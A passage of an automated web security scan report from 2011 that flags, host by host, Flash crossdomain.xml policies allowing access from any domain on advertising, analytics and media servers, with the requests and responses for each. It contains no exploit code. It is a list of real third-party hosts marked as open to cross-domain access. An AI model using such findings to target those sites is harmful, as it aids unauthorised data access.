Content-Type: text/xml
Content-Length: 302
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:04:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for FreeWheel Media Servers. For support contact webmaster at
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.12. http://admin.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Sat, 17 Sep 2011 01:32:38 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

5.13. http://ads.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.yimg.com

Response

HTTP/1.0 200 OK
Date: Fri, 16 Sep 2011 21:49:16 GMT
Cache-Control: max-age=315360000
Expires: Mon, 13 Sep 2021 21:49:16 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 11104
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

5.14. http://adserver.teracent.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1310680540000"
Last-Modified: Thu, 14 Jul 2011 21:55:40 GMT
Content-Type: application/xml
Content-Length: 373
Date: Sat, 17 Sep 2011 01:44:37 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.15. http://adunit.cdn.auditude.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adunit.cdn.auditude.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adunit.cdn.auditude.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=345600
Content-Type: text/x-cross-domain-policy
Date: Sat, 17 Sep 2011 01:09:46 GMT
ETag: "1376296382"
Expires: Wed, 21 Sep 2011 01:09:46 GMT
Last-Modified: Wed, 19 May 2010 16:53:13 GMT
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 265
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.16. http://afe.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Sat, 17 Sep 2011 01:20:35 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.17. http://alerts.4info.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alerts.4info.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: alerts.4info.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1302809905000"
Last-Modified: Thu, 14 Apr 2011 19:38:25 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 203
Date: Sat, 17 Sep 2011 01:50:23 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

5.18. http://amch.questionmarket.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:13 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "2005439f-d1-f999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=120, max=958
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.19. http://analytics.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytics.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:09:48 GMT
ETag: "b485279b64cb1:0"
Last-Modified: Tue, 05 Oct 2010 14:38:51 GMT
NDN-Server: Ana03
NDN-SiteVer: 3.0
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 286
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-ht
...[SNIP]...

5.20. http://aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:11ae"
Server: Microsoft-IIS/6.0
X-Server: D2A.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Sat, 17 Sep 2011 01:16:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:16:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

5.21. http://api.dimestore.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.dimestore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.dimestore.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sat, 17 Sep 2011 01:06:41 GMT
Content-Type: text/xml
Content-Length: 85
Last-Modified: Tue, 21 Sep 2010 19:36:25 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.22. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Mon, 17 Oct 2011 00:55:10 GMT
X-FB-Server: 10.42.64.79
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

5.23. http://ar.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:32 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.24. http://as.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sat, 17 Sep 2011 01:02:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:02:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.25. http://as1.suitesmart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as1.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e27-ca-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Date: Sat, 17 Sep 2011 00:52:11 GMT
Connection: close
Cache-Control: no-store

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.26. http://assets.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: assets.newsinc.com

Response

HTTP/1.1 200 OK
x-amz-id-2: kiJZ2XRCbn4XJhFS+QCWF87rUPrfHcGoO/xlP+iKMxiGeBMdRIR2qMQRSetZknmr
x-amz-request-id: 48CD9F0F6FA56789
Date: Sat, 17 Sep 2011 01:09:37 GMT
Last-Modified: Mon, 26 Oct 2009 18:52:29 GMT
ETag: "9a2df4412dfbe178fccafc4915ad186e"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 335
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.27. http://at.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:39:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Sat, 17 Sep 2011 07:39:39 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

5.28. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Sun, 18 Sep 2011 00:54:32 GMT
Date: Sat, 17 Sep 2011 00:54:32 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.29. http://b3.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:39:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Wed, 16 Jun 2010 21:44:11 GMT
ETag: "88019c-d0-4892c9f4c80c0"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.30. http://beta.abc.go.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.abc.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beta.abc.go.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:02 GMT
Server: Apache/2.2.16 (Amazon)
Last-Modified: Mon, 05 Sep 2011 20:15:03 GMT
ETag: "a81df-125-4ac375dc1bfc0"
Accept-Ranges: bytes
Content-Length: 293
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

5.31. http://bp.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Sat, 17 Sep 2011 01:38:53 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.32. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 17 Sep 2011 00:58:12 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.33. http://c.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:48:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.34. http://c.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Thu, 08 Sep 2011 22:01:13 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 116
Date: Sat, 17 Sep 2011 01:32:34 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.35. http://cache.specificmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:32 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n8 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn.com
Cache-Control: max-age=604800
Expires: Wed, 21 Sep 2011 07:37:24 GMT
Age: 236648
Content-Length: 194
Content-Type: text/xml
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.36. http://cache2-scripts.pressdisplay.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache2-scripts.pressdisplay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache2-scripts.pressdisplay.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: public
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:39:37 GMT
Expires: Sun, 18 Sep 2011 19:31:10 GMT
Server: Microsoft-IIS/7.5
wc: 2
X-Powered-By: ASP.NET
Content-Length: 257
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <allow-access-from domain="*.pressdisplay.com" secure="false" />
   <allow-access-from domain="*.newspaperdirect.com" secure="false" />
...[SNIP]...

5.37. http://cache2-styles.pressdisplay.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache2-styles.pressdisplay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache2-styles.pressdisplay.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: public
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:39:40 GMT
Expires: Sun, 18 Sep 2011 19:31:13 GMT
Last-Modified: Sat, 17 Sep 2011 01:39:37 GMT
Server: ECS (sjo/5227)
Vary: Accept-Encoding
wc: 2
X-Cache: HIT
X-Powered-By: ASP.NET
Content-Length: 257
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <allow-access-from domain="*.pressdisplay.com" secure="false" />
   <allow-access-from domain="*.newspaperdirect.com" secure="false" />
...[SNIP]...

5.38. http://cdn.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Sat, 17 Sep 2011 01:02:02 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

5.39. http://cdn.kaltura.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.kaltura.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 07 Jul 2011 08:23:35 GMT
X-Me: pa-apache5
X-UA-Compatible: IE=EmulateIE7
Content-Length: 392
Content-Type: text/xml
Vary: Accept-Encoding
Cache-Control: public, max-age=2385444
Expires: Fri, 14 Oct 2011 15:29:29 GMT
Date: Sat, 17 Sep 2011 00:52:05 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*" to-ports="*" secure="false"/>
...[SNIP]...

5.40. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

